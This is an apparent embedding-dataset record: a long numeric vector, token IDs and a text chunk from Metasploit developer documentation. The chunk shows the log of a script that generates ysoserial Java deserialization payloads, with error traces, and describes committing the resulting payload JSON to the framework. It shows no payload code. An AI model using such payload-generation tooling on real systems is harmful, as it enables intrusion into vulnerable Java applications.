0.4892389476299286, -0.03523373603820801, -0.6586736440658569, 0.24229462444782257, -0.24129898846149445, 0.36102548241615295, -0.17905300855636597, -0.18071186542510986, -0.15966057777404785, 0.49143052101135254, -0.1311240792274475, -0.09031938761472702, -0.4616711139678955, 0.20136836171150208, -1.0617152452468872, -0.5160465836524963, -0.2750636339187622, 0.32998186349868774, 0.7059506177902222, -0.00006948767259018496, 0.2024981528520584, 0.08158915489912033, 0.9092060327529907, 1.058201789855957, -0.03836658224463463, -0.16566024720668793, 0.8324676752090454, 0.19511672854423523, -0.6167429089546204, 0.08173318207263947, 0.13753926753997803, 0.8173283934593201, -0.3463621139526367, 0.8043997883796692, -0.3642928898334503, -0.5921856164932251, -0.25487104058265686, -0.6507755517959595, 0.07183028757572174, 0.6540579199790955, -0.10060634464025497, 0.20818303525447845, 0.6645293831825256, 0.6000837087631226, -0.7575263977050781, -0.17450255155563354, -0.7808192372322083, -1.2667056322097778, -0.4549526274204254, 0.09983577579259872, 0.21861465275287628, 0.503148078918457, -0.9211613535881042, -0.22606614232063293, 1.1425902843475342, 0.9926110506057739, -0.7970690727233887, 0.2875586748123169, 0.4478892385959625, -0.08784396201372147, -0.16322869062423706, 0.2685420513153076, 0.015474202111363411, 0.31455230712890625, -0.9537162184715271, 1.0804898738861084, 0.11682424694299698, 0.1811586320400238, -0.26156988739967346, 0.4259645938873291, 0.4257199168205261, 0.412097305059433, 0.6504515409469604, -0.5679945349693298, 0.22947482764720917, 0.3500056266784668, -0.650139331817627, -0.4173572063446045, -0.07661983370780945, 0.4244619607925415, 0.3833169639110565, 1.0194525718688965, 0.6535544395446777, -0.38195931911468506, 0.5990810990333557, 0.302796870470047, 0.21089576184749603, -0.30373120307922363, 0.24551934003829956, 0.6014770865440369, 0.5445562601089478, 0.16127894818782806, 0.45323410630226135, 0.10885906219482422, -0.21631842851638794, -0.09300017356872559, 0.48459187150001526, 0.2901863753795624, -0.0515126995742321, 0.7760587930679321, 0.34449502825737, 0.082884281873703, -0.7661327719688416, -0.7282082438468933, 0.5664332509040833, 0.7702742218971252, -0.5575406551361084, -0.8262230753898621, -0.18445183336734772, -0.351852685213089, -0.24296577274799347, -0.3607639968395233, 0.08078145980834961, 0.6348363161087036, -0.4439247250556946, 0.3700369894504547, -0.5431461930274963, -0.7222124934196472, -0.6855178475379944, -0.27061885595321655, -0.375139981508255, -0.518733561038971, -0.5191293954849243, 0.12349458783864975, 0.12903642654418945, -0.26195675134658813, 0.5912659168243408, 0.020467238500714302, -0.6984221935272217, -0.016916055232286453, 0.04486323520541191, 0.6628406643867493, -0.2580900490283966, -0.4315173625946045, -0.665817141532898, 0.17270082235336304, 0.43285077810287476, 0.8307618498802185, -0.24437442421913147, -0.009025722742080688, 0.21291765570640564, 0.09823250770568848, -0.13613644242286682, -0.19532835483551025, 0.6951464414596558, -0.06288515031337738, 0.2529173493385315, -0.15241435170173645, 0.4649580419063568, -0.04697094485163689, 0.2738095819950104, 0.2904070317745209, -0.6092997789382935, 0.9953643083572388, 0.08552419394254684, -0.16062487661838531, 0.49625685811042786, 0.5004974603652954, -1.2231266498565674, 0.5584396123886108, -0.09957676380872726, -0.34018009901046753, -0.6941465735435486, 0.4954845607280731, -0.03044513612985611, 0.3201417922973633, 0.16949373483657837, -0.05113113299012184, 0.14913631975650787, 0.0754772201180458, -0.2153918743133545, 0.06292383372783661, -0.018491806462407112, 0.7209391593933105, 0.16260844469070435, -0.5236898064613342, 0.35533833503723145, -0.1763262301683426, 0.11132458597421646, 0.07011418789625168, -0.675837516784668, 0.7214272022247314, -0.2931850254535675, -0.14307250082492828, 0.30556249618530273, -0.4493754506111145, -0.03329884633421898, -0.3988528549671173, 0.19890545308589935, -0.25167542695999146, 0.18132349848747253, 0.5943320989608765, -0.009274667128920555, 0.20399898290634155, 0.24511964619159698, 0.32668593525886536, 0.03055317886173725, 0.28331848978996277, -0.34817057847976685, -0.1470489650964737, 0.07343587279319763, 0.366047203540802, 0.047839369624853134, 0.721927285194397, -0.5874791741371155, -0.5569856762886047, 0.17535221576690674, 0.2710919976234436, 0.24406930804252625, -0.3329976797103882, 0.1773880422115326, -0.457825630903244, -0.328387588262558, -0.8111147880554199, 0.4860031306743622, 0.33659985661506653, 0.22755840420722961, -0.5587863922119141, 0.5261075496673584, -0.06554114818572998, -0.21149852871894836, 0.7811173796653748, -0.5295037627220154, -0.5106157660484314, 0.990889847278595, -0.043293096125125885, 0.8373642563819885, -0.7598169445991516, 0.33145755529403687, 0.40524470806121826, 0.08882750570774078, 0.4253259599208832, 0.3657011091709137, -0.4374999701976776, -0.330611914396286, -0.3666805028915405, 0.04337219521403313, -0.6595966815948486, -0.052877217531204224, -0.28867366909980774, 0.11371782422065735, -0.48571911454200745, -0.7330474257469177, -0.172933429479599, 0.30435892939567566, 0.7128379940986633, 0.4774503707885742, 0.2268034815788269, 0.03256498649716377, -0.10995221883058548, -0.43201637268066406, 0.30318179726600647, -0.15027572214603424, 0.3830386996269226, 0.09685814380645752, 0.5659468770027161, -0.5472054481506348, -0.3101405203342438, -0.1136963739991188, -0.5618669390678406, -0.8072847127914429, 0.04457268863916397, 0.3688586950302124, 0.013583056628704071, -0.3868415653705597, 0.10977455973625183, 0.0473630391061306, 0.016209954395890236, -0.16552278399467468, 0.1873006671667099, -0.2174638956785202, 0.8407376408576965, 0.24146318435668945, -0.9621840715408325, -0.2402106076478958, -0.5034972429275513, 0.10505367070436478, 0.18909426033496857, 0.3400275409221649, -0.16002118587493896, -0.8193750977516174, -0.582019567489624, -0.25602489709854126, -0.23671092092990875, 0.17743639647960663, 0.2556329369544983, 0.2669024169445038, -0.8584713935852051, 0.1642456352710724, 0.8227871656417847, -0.2168525755405426, -0.4809049665927887, -0.35726919770240784, -0.344908207654953, 0.6079286336898804, 0.7751798033714294, -0.8249058127403259, -0.519871175289154, -0.24188648164272308, -1.2198842763900757, 0.25947636365890503, -1.1455851793289185, 0.4500848054885864, 0.39728808403015137, -0.3804280161857605, -0.0118733374401927, 0.00037871539825573564, -0.23210415244102478, -0.39210811257362366, -0.22420568764209747, 0.374761700630188, -0.4552134871482849, -0.7343767285346985, 0.985478401184082, 0.02675888128578663, -0.13760966062545776, 0.5022295117378235, 0.14667372405529022, -0.014251232147216797, -0.11514261364936829, -0.497868150472641, -0.4209544062614441, 0.18345096707344055, -0.8152053952217102, 0.4278106689453125, -0.40689101815223694, 0.189330592751503, 0.16124427318572998, -0.5850052237510681, 0.25682973861694336, -0.2326456904411316, -0.5719922780990601, -0.6811668276786804, -0.6069697737693787, 0.39309361577033997, 0.5550411343574524, -0.1930040717124939, 0.7033802270889282, -0.39838823676109314, -0.3205311596393585, 0.2800557017326355, -0.05107431858778, -0.259429007768631, -1.0040947198867798, -0.5458009839057922, -0.09254417568445206, 0.4001769423484802, -0.4780481159687042, 0.9014315605163574, -0.2538182735443115, -0.495970755815506, 0.5987738370895386, -0.143304243683815, 0.2542877197265625, -0.2126770317554474, -0.08477391302585602, -1.2047605514526367, 0.00382333155721426, 0.04772622883319855, 0.34950512647628784, -0.3833334743976593, 0.30241620540618896, 0.20619086921215057, 0.5361590385437012, 0.494111031293869, -0.4428821802139282, -0.8552795052528381, 0.4224484860897064, 0.30791476368904114, -0.3990606963634491, -0.09778977185487747, 0.8991078734397888, -0.5653099417686462, 0.2351417988538742, -0.005765976384282112, -0.23042763769626617, -1.0995898246765137, -0.7373781800270081, 0.19980835914611816, -0.2300955355167389, 0.035127583891153336, -0.6005735397338867, -0.5638598799705505, 0.3412395417690277, 0.10364549607038498, -0.16121479868888855, -0.8381734490394592, -0.2786869406700134, 0.31782010197639465, -0.054214417934417725, 0.1340446025133133, 0.08300113677978516, -0.1515880823135376, -0.4433426856994629, 0.12784762680530548, 0.8347111940383911, 0.11172201484441757, -0.26750555634498596, 0.3928385376930237, 0.061728715896606445, 0.697809636592865, 0.5409903526306152, -0.613089919090271, -0.6804907321929932, 0.06712818890810013, -0.03278403356671333, -0.1658651977777481, -0.49460914731025696, -0.24889405071735382, 0.6026458740234375, -0.21479669213294983, -0.4303181767463684, 0.11842232942581177, -0.5394151210784912, 0.048308826982975006, -0.05545983463525772, 0.6052987575531006, -0.59052973985672, 0.03006443753838539, -0.12648406624794006, 0.6502474546432495, 0.7527105212211609, -0.2588801681995392, -0.673161506652832, 0.033196303993463516, -0.183156818151474, -1.1375281810760498, 0.545287013053894, -0.24389104545116425, -0.42256033420562744, 0.055073332041502, -0.07753230631351471, 0.9372681379318237, -0.3336547315120697, 0.57923424243927, 1.171797513961792, 0.29907259345054626, 0.05480026453733444, -0.6244798302650452, 0.35103920102119446, 0.3525351285934448, -0.2845887243747711, 0.4144074618816376, -0.22175492346286774, -0.4996331036090851, 0.10155176371335983, -0.35387468338012695, -0.41159069538116455, -0.5140469074249268, -0.40401431918144226, 0.6907830834388733, -0.19267557561397552, 0.44748738408088684, -0.4124993085861206, -0.7408316135406494, -0.6042437553405762, 0.43137678503990173, 0.2564540505409241, -0.19435489177703857, 0.5945689678192139, 0.5172869563102722, 0.2934359610080719, 0.042288150638341904, 0.04660846292972565, -0.37382328510284424, 0.16056816279888153, 0.623563826084137, -0.1822933852672577, -0.6795638799667358, 0.6801051497459412, 0.3745213449001312, -0.8578120470046997, -0.4223548471927643, -0.30716007947921753, -0.5922240614891052, -0.22592884302139282, -0.14843285083770752, -0.5311789512634277, 0.3641977310180664, 0.0414109006524086, -0.32228678464889526, 0.33567479252815247, 0.747248649597168, 0.502761960029602, -0.6243013143539429, 0.29356682300567627, 0.3432922065258026, 0.49370843172073364, 0.7644938826560974, -0.5662105083465576, -0.009002032689750195, -0.761819064617157, -0.2795991003513336, 0.00654207170009613, -0.037100035697221756, 0.5535786151885986, -0.06321676075458527, 0.49725741147994995, 0.26076263189315796, -0.2741345763206482, 0.5253908634185791, -0.5214407444000244, 0.20953024923801422, 1.2580870389938354, 0.022330323234200478, -0.9570436477661133, -0.2383059412240982, 0.16789431869983673, -0.03349579870700836, 0.304688036441803, -0.08542138338088989, -0.15999792516231537, -0.2401701807975769, -0.0865175798535347, -0.42998018860816956, -0.5648807287216187, -0.849826991558075, -0.9772576093673706, -0.7318229675292969, 0.1004372164607048, -0.25301650166511536, -0.317644864320755, -0.13160192966461182, -0.16853982210159302, -0.016050981357693672, -0.3714556396007538, 0.17940567433834076, -0.39966458082199097, 0.1334683746099472, -0.36467745900154114, 0.09050067514181137, -0.4682542085647583, -0.3039339780807495, 0.05603368952870369, -0.0638246163725853, -0.7610310912132263, -0.5086529850959778, -0.35407498478889465, 0.033269450068473816, -0.9576840400695801, 0.8005895614624023, -0.05814462900161743, -0.23643147945404053, 0.10563566535711288, -0.5076612830162048, 0.5462480187416077, 0.43065309524536133, -0.05559816583991051, 0.35516709089279175, -0.08646003156900406, -0.6229726076126099, 0.3081400692462921, -0.15961101651191711, -0.13286948204040527, 0.19450977444648743, 0.17981627583503723, 0.1837138831615448, -0.052053648978471756, -0.6692124605178833, 0.09196121245622635, 0.7264397740364075, -0.2066212147474289, 0.10750783979892731, -0.6279564499855042, 0.30651625990867615, 0.10402543842792511, -0.25352343916893005, 0.11614208668470383, 0.9399934411048889, 0.07047904282808304, 0.5465636253356934, -1.0521776676177979, 0.6922572255134583, 0.38970914483070374, 0.260320782661438, 0.10877404361963272, 0.19508594274520874, 0.5157262682914734, -0.2518559396266937, 0.3018023371696472, 0.20865319669246674, -0.2337806671857834, 0.615121603012085, -0.1685630977153778, -0.2708297669887543, -0.2036232054233551, -0.14505039155483246, 0.03704790025949478, 0.21765689551830292, -0.08845788240432739, -0.5041059255599976, 0.22807380557060242, -0.29401901364326477, 0.1696034073829651, -0.004390413872897625, -1.1165690422058105, -0.49487048387527466, 0.20524291694164276, -0.49187591671943665, -0.21932794153690338, -0.061697229743003845, -0.5400034785270691, -0.46513551473617554, -0.14875151216983795, -0.15818309783935547, 0.37997543811798096, 0.7525091767311096, 0.24122834205627441, 0.9590712189674377, -0.4591808021068573, -0.5340643525123596, 0.2445775270462036, -0.014337116852402687, -0.7835911512374878, -1.4207843542099, 0.015256436541676521, 0.857047975063324, 0.5334299802780151, -0.333147794008255, -0.2870985269546509, 0.10785387456417084, 0.2674570679664612, 0.6489152908325195, -0.21200329065322876, 0.04507100209593773, -0.6858580708503723, 0.23238250613212585, -0.1137332022190094, 0.3885137438774109, 0.10481511056423187, 0.42280450463294983, 0.42488282918930054, -0.2308603823184967, -0.4394986927509308, 0.6097605228424072, 0.2753204107284546, 0.6148725748062134, 0.3306194841861725, 0.6405555009841919, 0.24481433629989624, -0.265607625246048, 0.021420110017061234, -0.3797479271888733, 0.4984990954399109, 0.4667719602584839, 0.6559605002403259, 0.24565398693084717, 0.4850955307483673, 0.5032809972763062, -0.8326197266578674, -0.4280613660812378, 0.5595160722732544, -0.04846837744116783, -0.1828608363866806, 0.20386716723442078, -0.30503779649734497, 0.07111523300409317, 0.5528854727745056, -0.3940005302429199, 0.16869854927062988, -0.4703139066696167, -0.028931494802236557, -0.16794395446777344, -0.11208342760801315, 0.9255304336547852, -0.6144475936889648, 0.4702160656452179, -0.0034749251790344715, -0.11939584463834763, 0.6124516129493713, 0.3175720274448395, -0.8796947002410889, 0.21690355241298676, 0.8651512265205383, 0.489197313785553, -0.19101211428642273, 0.426548033952713, -0.24816639721393585, 0.5193781852722168, 0.3550451695919037, -0.7714513540267944, -0.43181073665618896, 0.2808420658111572, 0.27943092584609985, -0.8066257238388062, -0.9636042714118958, -0.002880753017961979, 0.64381343126297, 0.32973596453666687, 0.7774654030799866, 0.12368778139352798, -0.12996415793895721, -0.4237852990627289, 0.7764622569084167, -0.3710772693157196, 0.5101541876792908, 0.3268550634384155, -0.5485192537307739, -0.2377261221408844, 1.0797044038772583, -0.2336881309747696, 0.47205349802970886, -0.09197793155908585, 1.146829605102539, 0.024124126881361008, 0.5481883883476257, -0.10171309113502502, -0.4783889651298523, -0.3828674256801605, -0.22640225291252136, -0.12696674466133118, -0.5479784607887268, 0.3308016061782837, -0.3776091933250427, 0.6784787178039551, -0.131449893116951, -0.13647040724754333, -0.7376718521118164, 0.49472206830978394, -0.3833460807800293, -0.8011996746063232, 0.7861754894256592, 0.2409409135580063, -0.4286094009876251, -0.28100335597991943, -0.10617053508758545, 0.339362233877182, 0.5139471888542175, 0.18796567618846893, -0.7302836179733276, -0.3191721737384796, 0.20006968080997467, -0.29209136962890625, 0.70097815990448, -0.3251116871833801, -0.25796234607696533, 0.006155085284262896, -0.6499316096305847, -0.8030657172203064, 0.04636180028319359, -0.2739812135696411, -0.5072373151779175, 0.10649552941322327, 0.7196106314659119, 0.48334649205207825, 0.5278967618942261, -0.0817277804017067, -0.6078648567199707, 0.7196778059005737, 1.0967555046081543, -0.5209284424781799, 0.13140420615673065, 0.35729506611824036, -0.040069956332445145, 0.45875972509384155, -0.5666216015815735, 0.3887459635734558, -0.06239161640405655, 0.19187624752521515, -0.2864227294921875, 0.0917312279343605, -0.849358081817627, -0.510744035243988, 0.1090291365981102, 0.3939667344093323, 0.3076610267162323, 0.12536069750785828, -1.153188705444336, 0.09413912892341614, -0.26733702421188354, -0.06942716240882874, -0.39909428358078003, -0.03768560290336609, 0.012068398296833038, 0.18094408512115479, 0.7139436602592468, -1.3321620225906372, 4.534856796264648, 0.2508430778980255, 0.07677134871482849, 0.17392343282699585, 0.13762924075126648, 0.29058408737182617, 1.2727057933807373, -1.152583122253418, 0.15148642659187317, -0.5374036431312561, 0.06894862651824951, -0.14614354074001312, 0.45544788241386414, 0.04616319388151169, 0.702221691608429, 0.15175500512123108, -0.5924198627471924, 0.03204807639122009, 0.33648207783699036, -0.7248701453208923, -0.9988872408866882, -0.049006033688783646, -0.4629926085472107, 0.8338212370872498, -0.008775807917118073, -0.21976561844348907, -0.24116088449954987, -0.40310734510421753, 0.015901310369372368, 0.033873263746500015, 0.2886095643043518, -0.12588812410831451, 0.01653393730521202, 0.1376028209924698, -0.4850136935710907, -0.20292513072490692, 0.15021371841430664, -0.5550225377082825, -0.580386221408844, -0.09573467820882797, -0.15344391763210297, 0.24635307490825653, -0.08448009192943573, -0.888571560382843, 0.22195248305797577, 0.6968365907669067, -0.8049635291099548, 0.4608800411224365, 0.5359736680984497, -0.9083544015884399, 0.8167009353637695, 0.06922133266925812, 0.5028683543205261, -0.04535068944096565, -0.9081376791000366, 0.23147232830524445, 0.37810686230659485, -0.10322622209787369, 0.08046086877584457, 0.31365713477134705, 0.2533864676952362, -0.44606995582580566, -0.0885610431432724, 0.2687892019748688, -0.7781108617782593, 0.5030004978179932, 0.17379248142242432, 0.051966480910778046, -0.12172824144363403, 0.1694972813129425, -0.1718713790178299, -0.2681921720504761, -0.4504975378513336, 0.2770848572254181, 1.0594117641448975, 0.04674718901515007, -0.22399693727493286, 0.18490710854530334, 0.41161370277404785, -0.4804365336894989, -0.0038156555965542793, -0.37037983536720276, -1.101474404335022, 0.3824850022792816, 0.3749808669090271, 1.0064985752105713, 0.16542840003967285, -0.4620046019554138, -0.24645385146141052, 0.20635613799095154, 0.4150100648403168, 0.3151220977306366, -0.6605523824691772, 0.03887308016419411, 0.30727794766426086 ]
[ 4892, 1006, 2193, 14192, 3686, 2595, 24422, 1012, 9262, 1024, 3515, 1007, 2012, 9262, 1012, 11374, 1012, 16109, 1012, 11968, 20240, 3372, 1006, 16109, 1012, 9262, 1024, 5354, 2475, 1007, 2012, 9262, 1012, 11374, 1012, 16109, 1012, 11968, 20240, 3372, 1006, 16109, 1012, 9262, 1024, 6079, 2629, 1007, 2012, 1061, 17063, 11610, 2140, 1012, 18093, 2015, 1012, 3781, 8737, 9863, 24454, 1012, 2131, 16429, 20614, 1006, 3781, 8737, 9863, 24454, 1012, 9262, 1024, 4413, 1007, 2012, 1061, 17063, 11610, 2140, 1012, 18093, 2015, 1012, 3781, 8737, 9863, 24454, 1012, 2131, 16429, 20614, 1006, 3781, 8737, 9863, 24454, 1012, 9262, 1024, 4090, 1007, 2012, 1061, 17063, 11610, 2140, 1012, 9699, 4502, 8516, 10441, 2094, 1012, 2364, 1006, 9699, 4502, 8516, 10441, 2094, 1012, 9262, 1024, 4090, 1007, 7561, 1024, 7561, 2098, 2096, 11717, 1005, 3781, 8737, 9863, 24454, 1005, 1998, 2009, 2097, 2025, 2022, 3569, 11717, 18093, 2015, 2005, 1046, 3385, 2487, 1012, 1012, 1012, 11717, 18093, 2015, 2005, 9262, 18719, 3367, 8545, 6392, 2487, 1012, 1012, 1012, 11717, 18093, 2015, 2005, 26219, 2243, 2581, 2226, 17465, 1012, 1012, 1012, 11717, 18093, 2015, 2005, 1046, 22123, 8747, 2487, 1012, 1012, 1012, 7561, 2096, 11717, 2030, 7642, 6026, 18093, 9262, 1012, 11374, 1012, 6206, 2906, 22850, 15781, 2595, 24422, 1024, 4895, 6342, 9397, 15613, 3094, 1031, 1033, 2012, 1061, 17063, 11610, 2140, 1012, 18093, 2015, 1012, 1046, 22123, 8747, 2487, 1012, 2131, 16429, 20614, 1006, 1046, 22123, 8747, 2487, 1012, 9262, 1024, 4720, 1007, 2012, 1061, 17063, 11610, 2140, 1012, 18093, 2015, 1012, 1046, 22123, 8747, 2487, 1012, 2131, 16429, 20614, 1006, 1046, 22123, 8747, 2487, 1012, 9262, 1024, 4413, 1007, 2012, 1061, 17063, 11610, 2140, 1012, 9699, 4502, 8516, 10441, 2094, 1012, 2364, 1006, 9699, 4502, 8516, 10441, 2094, 1012, 9262, 1024, 4090, 1007, 7561, 1024, 7561, 2098, 2096, 11717, 1005, 1046, 22123, 8747, 2487, 1005, 1998, 2009, 2097, 2025, 2022, 3569, 11717, 18093, 2015, 2005, 9587, 5831, 17305, 10606, 2080, 2487, 1012, 1012, 1012, 11717, 18093, 2015, 2005, 2026, 12172, 2015, 2487, 1012, 1012, 1012, 11717, 18093, 2015, 2005, 2026, 12172, 2015, 2475, 1012, 1012, 1012, 7561, 2096, 11717, 2030, 7642, 6026, 18093, 9262, 1012, 11374, 1012, 6206, 2906, 22850, 15781, 2595, 24422, 1024, 3094, 4289, 2003, 1024, 1026, 2918, 1035, 24471, 2140, 1028, 1024, 1026, 2465, 18442, 1028, 2012, 1061, 17063, 11610, 2140, 1012, 18093, 2015, 1012, 2026, 12172, 2015, 2475, 1012, 2131, 16429, 20614, 1006, 2026, 12172, 2015, 2475, 1012, 9262, 1024, 4700, 1007, 2012, 1061, 17063, 11610, 2140, 1012, 9699, 4502, 8516, 10441, 2094, 1012, 2364, 1006, 9699, 4502, 8516, 10441, 2094, 1012, 9262, 1024, 4090, 1007, 7561, 1024, 7561, 2098, 2096, 11717, 1005, 2026, 12172, 2015, 2475, 1005, 1998, 2009, 2097, 2025, 2022, 3569, 11717, 18093, 2015, 2005, 4199, 1012, 1012, 1012, 11717, 18093, 2015, 2005, 3500, 2487, 1012, 1012, 1012, 11717, 18093, 2015, 2005, 3500, 2475, 1012, 1012, 1012, 11717, 18093, 2015, 2005, 24471, 6392, 3619, 1012, 1012, 1012, 7561, 2096, 11717, 2030, 7642, 6026, 18093, 9262, 1012, 5658, 1012, 15451, 29021, 3126, 2571, 2595, 24422, 1024, 2053, 8778, 1024, 2012, 9262, 1012, 5658, 1012, 24471, 2140 ]
metasploit
133.txt
4
. < init > ( url. java : 593 ) at ysoserial. payloads. urldns. getobject ( urldns. java : 56 ) at ysoserial. generatepayload. main ( generatepayload. java : 34 ) error : errored while generating'urldns'and it will not be supported generating payloads for vaadin1... generating payloads for wicket1... error while generating or serializing payload java. lang. illegalargumentexception : bad command format. at ysoserial. payloads. wicket1. getobject ( wicket1. java : 59 ) at ysoserial. payloads. wicket1. getobject ( wicket1. java : 49 ) at ysoserial. generatepayload. main ( generatepayload. java : 34 ) error : errored while generating'wicket1'and it will not be supported done! successfully generated 0 static payloads and 22 dynamic payloads. skipped 8 unsupported payloads. at completion, the data / ysoserial _ payloads. json file is overwritten and the 22 dynamic payloads are ready for use within the framework. afterward, the developer should follow the standard git procedures to add and commit the new json file before generating a pull request and landing the updated json into the framework ’ s master branch. [SEP]
[ -0.5724502205848694, 0.008472112938761711, -0.008863900788128376, 0.10388461500406265, -0.4226084053516388, -0.2963745892047882, -0.10973295569419861, -0.262226939201355, 0.4314913749694824, 0.7387731671333313, 0.15132103860378265, -0.14603927731513977, 0.6219349503517151, -0.6610169410705566, -0.7044987678527832, -0.6698350310325623, -0.21405844390392303, -0.11677801609039307, -0.13828152418136597, 0.16886386275291443, 0.11702960729598999, 0.7142508625984192, -0.7941745519638062, -0.4591078460216522, 0.16903723776340485, 0.33377325534820557, 0.32881107926368713, 0.43001145124435425, 1.3846421241760254, 0.283315509557724, -0.45775845646858215, -0.31775009632110596, 0.3954121768474579, -0.5446394681930542, 0.21275556087493896, 0.30382218956947327, 0.20380251109600067, 0.2674039304256439, -0.24708157777786255, -0.5222943425178528, 0.722110390663147, -0.062404077500104904, 0.46061450242996216, -0.8918056488037109, -0.772428035736084, -0.13943983614444733, 0.4347306787967682, -0.5284926295280457, -0.14549367129802704, -0.3310832679271698, -0.6089909672737122, 0.26787298917770386, -0.1173587441444397, 0.37727096676826477, -0.503388524055481, -0.7176789045333862, -0.15110532939434052, -0.48407384753227234, -0.7686054706573486, 0.22172918915748596, 0.004416932351887226, 0.24651439487934113, -0.007805509027093649, -0.6876566410064697, -0.6035833358764648, 0.11355414241552353, -0.31674501299858093, 0.30769526958465576, 0.05806596949696541, -0.6537516713142395, -0.7938562631607056, 0.7450826168060303, -0.1906827986240387, -1.3835877180099487, -0.4043820798397064, 0.6669961214065552, -0.45050427317619324, -0.06583674997091293, 0.11763110756874084, 0.5395364761352539, -0.3056873083114624, 0.4307289123535156, 0.5118004679679871, -0.2883194088935852, -0.17093844711780548, -0.4574055075645447, 1.0067578554153442, 0.34780779480934143, 0.6752273440361023, 0.4313628673553467, -0.48149216175079346, 0.5681189894676208, -1.1662980318069458, 0.14084796607494354, -0.22435763478279114, 0.15066753327846527, -0.6712682247161865, 0.7825477719306946, -0.6225512623786926, -0.57075434923172, 0.7742589116096497, 1.061959147453308, -0.08568186312913895, 0.16531559824943542, -0.3110233247280121, 0.4748985469341278, 0.2545433044433594, 0.563015878200531, -0.8120352029800415, 0.13237641751766205, 0.15426969528198242, -0.21562954783439636, 0.6995049118995667, -0.5115486979484558, 0.07610363513231277, -0.1931101232767105, 0.13598082959651947, -0.0486496239900589, -0.5164591670036316, -0.5898759365081787, 0.578943133354187, 0.2999655604362488, 0.39012837409973145, -0.22286994755268097, -0.3882324695587158, -0.3213805556297302, 0.2709200084209442, 0.9709462523460388, -0.1699097752571106, -0.5783740878105164, 0.43878820538520813, -0.2526381313800812, 0.4911275804042816, 0.9872797131538391, -0.7516098618507385, -0.22886376082897186, 0.42478707432746887, 0.3970317244529724, 0.7132495641708374, -0.7148674130439758, -0.05541419982910156, -0.5391350984573364, 0.446363627910614, 1.9885309934616089, -0.7633588314056396, 0.13227114081382751, 0.3335399329662323, -0.12146633863449097, -1.5501543283462524, -0.4634605348110199, -0.6322882175445557, -0.4945288896560669, 0.9499569535255432, 0.2794848382472992, 0.22900311648845673, 0.270455539226532, 0.11859597265720367, 0.5458682775497437, 0.4861924946308136, -0.16273902356624603, -0.1327085644006729, 0.6927675008773804, -1.6045825481414795, -0.05454624071717262, -0.18122220039367676, 0.41328129172325134, -0.7673311829566956, -0.265458345413208, -0.07436305284500122, -0.5741543769836426, 0.7834374308586121, -0.17300640046596527, 0.027267511934041977, 0.2777007520198822, 0.7329403758049011, 0.003792321076616645, 0.42318588495254517, 0.27440670132637024, 0.616645872592926, 0.5758523941040039, 0.29440897703170776, 0.46642017364501953, 0.5099771618843079, 1.450701355934143, 0.256317675113678, 0.677969217300415, 0.7488941550254822, 0.12635788321495056, -0.4393934905529022, -0.35600870847702026, 0.4221538305282593, 0.574864387512207, -0.053953249007463455, 0.30876776576042175, -0.33801114559173584, 0.4738563597202301, -1.0736205577850342, 0.30209216475486755, -0.307559996843338, -0.48586979508399963, -0.7512456178665161, 0.02604072540998459, -0.29452377557754517, -0.2817240059375763, -0.3404180407524109, -0.941003680229187, 0.39113134145736694, 0.317687064409256, -0.571890652179718, 0.27569353580474854, 0.3271297812461853, 0.07268676161766052, -0.3260742723941803, 0.09023741632699966, 0.18034787476062775, 0.0826806053519249, -1.0568033456802368, 0.9176099300384521, 0.09517665207386017, 0.12629055976867676, -1.775126576423645, 0.38687604665756226, 0.6780897378921509, 0.24143332242965698, 0.06711635738611221, -1.0018466711044312, 0.43824681639671326, 0.2294148951768875, -0.3226996958255768, 0.17097145318984985, 0.3747735321521759, 0.4555363059043884, 0.18741247057914734, 0.8792147040367126, 0.6701777577400208, 0.17482110857963562, 0.6705400347709656, 0.3641963303089142, 0.25915735960006714, 0.44668135046958923, -0.7725747227668762, 1.0635993480682373, -0.5700046420097351, 0.14821943640708923, 0.3658287525177002, -0.4706472158432007, -0.15418247878551483, -0.11076783388853073, 0.4512724280357361, 0.32882848381996155, -0.44636058807373047, 0.9598715305328369, 0.7241477370262146, -0.07538360357284546, -1.1532814502716064, -0.5318740010261536, 0.45281973481178284, 0.6830224990844727, -0.6363435387611389, -0.12126819789409637, 0.8082045316696167, 0.621036171913147, -0.45751580595970154, -0.07828474789857864, 0.34002628922462463, 0.8055992722511292, -0.08112890273332596, 0.13830965757369995, -0.1632530689239502, -0.26957967877388, -0.4476149380207062, -0.7662763595581055, -0.8509807586669922, -0.11526420712471008, -0.5189571380615234, 0.07176042348146439, 0.9808514714241028, -1.0021781921386719, 0.2887920141220093, 0.03320208191871643, 0.13494271039962769, 0.27386054396629333, 0.23549123108386993, 0.2553233802318573, 0.6019641160964966, 0.2468513697385788, 0.1799471378326416, 0.5846426486968994, 0.08591577410697937, 0.6644529104232788, -0.6070241928100586, -0.3946892321109772, -0.1207430437207222, -0.2885703146457672, -0.4273252785205841, -0.3725987374782562, 0.3068942129611969, 0.052804939448833466, -0.03179877996444702, -0.09314087778329849, -0.5546820163726807, -0.1949068009853363, -0.04672809690237045, 0.19639655947685242, -0.6105237603187561, 0.6595551371574402, 1.013723373413086, -0.14035560190677643, 1.1503952741622925, 0.3180064857006073, -0.3569248616695404, 0.12981131672859192, -0.04811083525419235, -0.03169915825128555, -0.8013559579849243, 0.6291651725769043, -0.1512785404920578, 0.14080595970153809, -0.35496070981025696, -0.4467524290084839, -0.6430624127388, -0.50234055519104, 0.05383409932255745, 0.33307233452796936, -0.06644774973392487, 1.065828561782837, -0.16983869671821594, -1.486398696899414, 0.005612989421933889, -0.6776924133300781, 0.22135499119758606, -0.2573857605457306, -0.30021148920059204, 0.357511967420578, -0.05430568382143974, 0.41937896609306335, -0.14733298122882843, -0.2266831248998642, 0.011337637901306152, -0.7708010077476501, 0.27136820554733276, -0.39996492862701416, 0.24008551239967346, 0.8637084364891052, 0.1588161289691925, -0.14521801471710205, 1.0233250856399536, 0.5490601062774658, 0.7174757122993469, 0.021108653396368027, -0.2884286344051361, 0.4103996157646179, -0.048667795956134796, 0.012327081523835659, 0.06987594813108444, 0.8626958727836609, -0.41023775935173035, -0.45395684242248535, 0.18255488574504852, -0.04591881483793259, 0.18564333021640778, 0.6707017421722412, -0.10825756937265396, -0.8217553496360779, -0.28985947370529175, -0.37683382630348206, 0.23018313944339752, 0.952394425868988, 1.5864372253417969, -0.4416545033454895, 0.4804610013961792, -0.16753937304019928, -0.2511807382106781, 0.3253015875816345, -0.04122327268123627, -0.4192515015602112, 0.6179748177528381, -0.4885118901729584, 0.8206917643547058, -0.5277611017227173, -0.42001432180404663, 0.6480817794799805, 0.33096471428871155, 1.0945098400115967, 0.8228540420532227, 0.13849399983882904, -0.36904987692832947, -0.4741840362548828, -0.5427390336990356, -0.011854548007249832, 